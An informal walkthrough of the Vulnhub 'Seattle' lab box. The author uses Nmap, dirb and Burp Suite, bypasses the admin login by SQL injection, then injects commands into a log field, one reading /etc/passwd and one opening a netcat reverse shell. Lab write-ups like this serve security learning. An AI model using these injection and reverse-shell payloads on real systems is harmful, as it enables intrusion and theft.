Seatle Vulhun
Chill I got the admin panel and shell privelge was only apache though i got the knowledge of Sql-injection and i use Burpsuit
Let's Breach
Let's Breach
Penetration Methodologies:
Finding Ip
- Browsing HTTP Service
- Directory Bruteforce using dirb
- Sql-Injection
- Reverse shell using NC
I got the IP of Victim machine and it was
I use Nmap to scan what port are open and found that only 80 port was open using apache 2.4.16.I didn't found any serious exploit
The OS was Fedora
I surf the port 80 and found as online shopping page IDK i was right or wrong
Then i go for directory bruteforcing using dirb as my favourite tool.However you can use gobuster also some recommended me highly because of it's feautures
dirb -h
and boom i got the admin.php directory that was quick
and in source page of index.php i found terms.php where i can use it later so i saved it in my text editor
while enumerating admin panel
The email found that i found was at the bottom of the page
Then i go for admin and found some php file and the admin.php was a login page
I register the and login as test
I got login as test you can just do it manully .However i tried first wrong email and password and then again use and wrong password then i found some interesting
There was two things to see
Invalid username and invalid password was the result what i thought to but
and again you see with right email and wrong password the result was interesting.
so,let's use the mail we found in terms.php page
and the result was interesting
Invalid password means the mail was correct
Let's check for the sql-injection i though for this site it was the right choice i fireup the burp and found that the vulneribiltiy was sql-injection where i can bypass the admin panel and i was damm right
Let's brech the admin panel
Forwarding the page with this request to gain admin page was enough
I think the page can be gained just by typing the URL that i was redirected
The page was fully loaded with input text field i though of command injection and found that in Log Name you can just type 'cat /etc/passwd' 2>&1;
to see all the text in /etc/passwd file this confirms that i can land my reverse shell bash script in Log input
Let's do reverse netcat with prot 9999
'nc -e /bin/sh 9999' 2&>1;
Boom i got the reverse shell
'nc -e /bin/sh 9999' 2&>1;
Boom i got the reverse shell
The box was not that hard
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